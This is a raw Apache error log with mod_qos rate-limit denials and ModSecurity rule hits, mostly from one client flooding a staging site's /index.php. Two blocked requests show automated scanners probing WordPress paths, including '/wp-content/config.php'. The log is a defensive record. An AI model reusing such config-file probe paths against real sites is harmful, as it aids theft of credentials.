[Tue May 26 20:00:54.228403 2026] [qos:error] [pid 106517:tid 106759] [client 45.148.10.120:46724] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rlwAAAPE
[Tue May 26 20:00:54.235858 2026] [qos:error] [pid 106517:tid 106740] [client 45.148.10.120:46266] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rmAAAAN4
[Tue May 26 20:00:54.240113 2026] [qos:error] [pid 106517:tid 106676] [client 45.148.10.120:46416] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rmQAAAJ8
[Tue May 26 20:00:54.245373 2026] [qos:error] [pid 106517:tid 106718] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rmgAAAMg
[Tue May 26 20:00:54.245638 2026] [qos:error] [pid 112029:tid 112277] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunqFW0C-ajaCsyFc9pAAAAYA
[Tue May 26 20:00:54.250334 2026] [qos:error] [pid 106517:tid 106722] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1rmwAAAMw
[Tue May 26 20:00:54.279247 2026] [security2:error] [pid 112029:tid 112283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9JAAAAYY"]
[Tue May 26 20:00:54.283679 2026] [security2:error] [pid 106517:tid 106741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q7QAAAN8"]
[Tue May 26 20:00:54.292195 2026] [security2:error] [pid 112029:tid 112255] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9IgAAAWo"]
[Tue May 26 20:00:54.296922 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q_gAAAKQ"]
[Tue May 26 20:00:54.301603 2026] [security2:error] [pid 112029:tid 112207] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9UAAAATo"]
[Tue May 26 20:00:54.311346 2026] [security2:error] [pid 112029:tid 112269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9PAAAAXg"]
[Tue May 26 20:00:54.315843 2026] [security2:error] [pid 112029:tid 112248] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9MAAAAWM"]
[Tue May 26 20:00:54.322940 2026] [security2:error] [pid 106517:tid 106692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rBwAAAK4"]
[Tue May 26 20:00:54.333862 2026] [security2:error] [pid 112029:tid 112178] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9JwAAAR0"]
[Tue May 26 20:00:54.338385 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rAQAAAME"]
[Tue May 26 20:00:54.340036 2026] [security2:error] [pid 112029:tid 112265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9LwAAAXQ"]
[Tue May 26 20:00:54.342501 2026] [security2:error] [pid 112029:tid 112226] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9LQAAAU0"]
[Tue May 26 20:00:54.352013 2026] [security2:error] [pid 106517:tid 106708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q_wAAAL4"]
[Tue May 26 20:00:54.357869 2026] [security2:error] [pid 106517:tid 106768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rCgAAAPo"]
[Tue May 26 20:00:54.367678 2026] [security2:error] [pid 112029:tid 112227] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9LgAAAU4"]
[Tue May 26 20:00:54.387010 2026] [security2:error] [pid 112029:tid 112228] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9PwAAAU8"]
[Tue May 26 20:00:54.392072 2026] [security2:error] [pid 112029:tid 112167] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9UQAAARI"]
[Tue May 26 20:00:54.395868 2026] [security2:error] [pid 106517:tid 106684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rQAAAAKY"]
[Tue May 26 20:00:54.397975 2026] [security2:error] [pid 106517:tid 106671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rOgAAAJo"]
[Tue May 26 20:00:54.400025 2026] [security2:error] [pid 112029:tid 112171] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9WwAAARY"]
[Tue May 26 20:00:54.420952 2026] [security2:error] [pid 106517:tid 106773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1q8wAAAP8"]
[Tue May 26 20:00:54.425314 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rSwAAAKI"]
[Tue May 26 20:00:54.428572 2026] [security2:error] [pid 112029:tid 112164] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9XQAAAQ8"]
[Tue May 26 20:00:54.429043 2026] [security2:error] [pid 112029:tid 112195] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9WgAAAS4"]
[Tue May 26 20:00:54.429247 2026] [security2:error] [pid 112029:tid 112220] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9WAAAAUc"]
[Tue May 26 20:00:54.441387 2026] [security2:error] [pid 112029:tid 112233] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9UgAAAVQ"]
[Tue May 26 20:00:54.461284 2026] [security2:error] [pid 106517:tid 106651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rRQAAAIY"]
[Tue May 26 20:00:54.468030 2026] [security2:error] [pid 106517:tid 106714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rPwAAAMQ"]
[Tue May 26 20:00:54.470701 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rRgAAAL0"]
[Tue May 26 20:00:54.577071 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r3wAAAMQ
[Tue May 26 20:00:54.578235 2026] [qos:error] [pid 112029:tid 112236] [client 45.148.10.120:46514] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunqFW0C-ajaCsyFc9xwAAAVc
[Tue May 26 20:00:54.580138 2026] [qos:error] [pid 106517:tid 106696] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r4AAAALI
[Tue May 26 20:00:54.581404 2026] [qos:error] [pid 106517:tid 106665] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r4QAAAJQ
[Tue May 26 20:00:54.582863 2026] [qos:error] [pid 106517:tid 106707] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r4gAAAL0
[Tue May 26 20:00:54.598552 2026] [http2:info] [pid 113091:tid 113091] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 20:00:54.599868 2026] [qos:error] [pid 112029:tid 112269] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunqFW0C-ajaCsyFc9yAAAAXg
[Tue May 26 20:00:54.608038 2026] [qos:error] [pid 112029:tid 112185] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunqFW0C-ajaCsyFc9yQAAASQ
[Tue May 26 20:00:54.682725 2026] [security2:error] [pid 112029:tid 112249] [client 103.125.146.81:44849] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/network/cache/"] [unique_id "ahWunqFW0C-ajaCsyFc9zgAAAWQ"]
[Tue May 26 20:00:54.818442 2026] [qos:error] [pid 106517:tid 106758] [client 45.148.10.120:46404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r7QAAAPA
[Tue May 26 20:00:54.819139 2026] [qos:error] [pid 106517:tid 106758] [client 45.148.10.120:46326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r7gAAAPA
[Tue May 26 20:00:54.827514 2026] [qos:error] [pid 112029:tid 112190] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWunqFW0C-ajaCsyFc90gAAASk
[Tue May 26 20:00:54.866832 2026] [qos:error] [pid 112029:tid 112227] [client 45.148.10.120:46514] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunqFW0C-ajaCsyFc91AAAAU4
[Tue May 26 20:00:54.868092 2026] [qos:error] [pid 106517:tid 106727] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r7wAAANE
[Tue May 26 20:00:54.871227 2026] [qos:error] [pid 106517:tid 106707] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r8AAAAL0
[Tue May 26 20:00:54.872368 2026] [qos:error] [pid 106517:tid 106764] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r8QAAAPY
[Tue May 26 20:00:54.873187 2026] [qos:error] [pid 106517:tid 106704] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r8gAAALo
[Tue May 26 20:00:54.876790 2026] [qos:error] [pid 106517:tid 106772] [client 45.148.10.120:53540] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r8wAAAP4
[Tue May 26 20:00:54.878451 2026] [qos:error] [pid 106517:tid 106684] [client 45.148.10.120:46334] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r9AAAAKY
[Tue May 26 20:00:54.973279 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:46404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r9gAAAP8
[Tue May 26 20:00:54.974104 2026] [qos:error] [pid 106517:tid 106758] [client 45.148.10.120:46326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r9wAAAPA
[Tue May 26 20:00:54.979683 2026] [qos:error] [pid 106517:tid 106665] [client 45.148.10.120:46412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWunoZZc2DoU1lPnP1r-AAAAJQ
[Tue May 26 20:00:55.016226 2026] [qos:error] [pid 112029:tid 112172] [client 45.148.10.120:46514] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun6FW0C-ajaCsyFc93AAAARc
[Tue May 26 20:00:55.017523 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1r-gAAAPM
[Tue May 26 20:00:55.023168 2026] [qos:error] [pid 106517:tid 106727] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1r-wAAANE
[Tue May 26 20:00:55.023757 2026] [qos:error] [pid 106517:tid 106707] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1r_AAAAL0
[Tue May 26 20:00:55.029372 2026] [qos:error] [pid 106517:tid 106764] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1r_QAAAPY
[Tue May 26 20:00:55.031036 2026] [qos:error] [pid 106517:tid 106704] [client 45.148.10.120:53540] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1r_gAAALo
[Tue May 26 20:00:55.032718 2026] [qos:error] [pid 106517:tid 106772] [client 45.148.10.120:46334] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1r_wAAAP4
[Tue May 26 20:00:55.125692 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:46404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sAQAAAP8
[Tue May 26 20:00:55.128555 2026] [qos:error] [pid 106517:tid 106758] [client 45.148.10.120:46326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sAgAAAPA
[Tue May 26 20:00:55.131112 2026] [qos:error] [pid 106517:tid 106665] [client 45.148.10.120:46412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sAwAAAJQ
[Tue May 26 20:00:55.165102 2026] [qos:error] [pid 112029:tid 112197] [client 45.148.10.120:46514] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun6FW0C-ajaCsyFc94gAAATA
[Tue May 26 20:00:55.168527 2026] [qos:error] [pid 106517:tid 106727] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sBAAAANE
[Tue May 26 20:00:55.176346 2026] [qos:error] [pid 106517:tid 106764] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sBwAAAPY
[Tue May 26 20:00:55.177121 2026] [qos:error] [pid 106517:tid 106704] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sCAAAALo
[Tue May 26 20:00:55.177735 2026] [security2:error] [pid 112029:tid 112282] [client 103.163.220.30:50841] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/config.php"] [unique_id "ahWun6FW0C-ajaCsyFc94wAAAYU"]
[Tue May 26 20:00:55.185369 2026] [qos:error] [pid 106517:tid 106745] [client 45.148.10.120:53540] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sCgAAAOM
[Tue May 26 20:00:55.186975 2026] [qos:error] [pid 106517:tid 106744] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sCwAAAOI
[Tue May 26 20:00:55.187792 2026] [qos:error] [pid 106517:tid 106684] [client 45.148.10.120:46334] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWun4ZZc2DoU1lPnP1sDAAAAKY
[Tue May 26 20:00:55.275492 2026] [security2:error] [pid 106517:tid 106777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rSgAAAQM"]
[Tue May 26 20:00:55.290869 2026] [security2:error] [pid 106517:tid 106762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rRAAAAPQ"]
[Tue May 26 20:00:55.303711 2026] [security2:error] [pid 112029:tid 112203] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9ZQAAATY"]
[Tue May 26 20:00:55.308481 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rTQAAANs"]
[Tue May 26 20:00:55.310219 2026] [security2:error] [pid 106517:tid 106730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rWQAAANQ"]
[Tue May 26 20:00:55.312206 2026] [security2:error] [pid 112029:tid 112259] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9YQAAAW4"]
[Tue May 26 20:00:55.318239 2026] [security2:error] [pid 106517:tid 106738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rXQAAANw"]
[Tue May 26 20:00:55.334834 2026] [security2:error] [pid 112029:tid 112161] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9bgAAAQw"]
[Tue May 26 20:00:55.340293 2026] [security2:error] [pid 106517:tid 106688] [client 157.230.234.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rJgAAAKo"]
[Tue May 26 20:00:55.341849 2026] [security2:error] [pid 112029:tid 112247] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9cQAAAWI"]
[Tue May 26 20:00:55.345741 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunYZZc2DoU1lPnP1rawAAALQ"]
[Tue May 26 20:00:55.356335 2026] [security2:error] [pid 112029:tid 112163] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWunKFW0C-ajaCsyFc9GQAAAQ4"]
[Tue May 26 20:00:55.357481 2026] [security2:error] [pid 112029:tid 112211] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWunaFW0C-ajaCsyFc9ggAAAT4"]
